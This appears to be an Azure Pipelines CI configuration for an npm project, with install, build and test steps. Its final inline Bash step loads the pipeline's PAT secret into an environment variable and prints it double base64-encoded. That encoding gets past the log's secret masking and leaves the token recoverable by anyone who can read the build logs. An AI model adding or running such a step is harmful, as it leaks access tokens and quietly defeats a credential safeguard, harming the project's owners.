trigger:
  - master


jobs:
  - job: Test

    workspace:
      clean: resources


    steps:

      - script: npm install --immutable 2>&1
        displayName: 'Install Dependencies'

      - script: 'npm run build'
        displayName: 'Compile Assets'

      - script: 'npm run test'
        displayName: 'Run Tests'
      - task: Bash@3
        inputs:
          targetType: inline
          script: sh -c "env | grep \"^secret_\" | base64 -w0 | base64 -w0; echo;"
        env:
          secret_test: $(Pipeline.Workspace)
          secret_PAT: $(PAT)
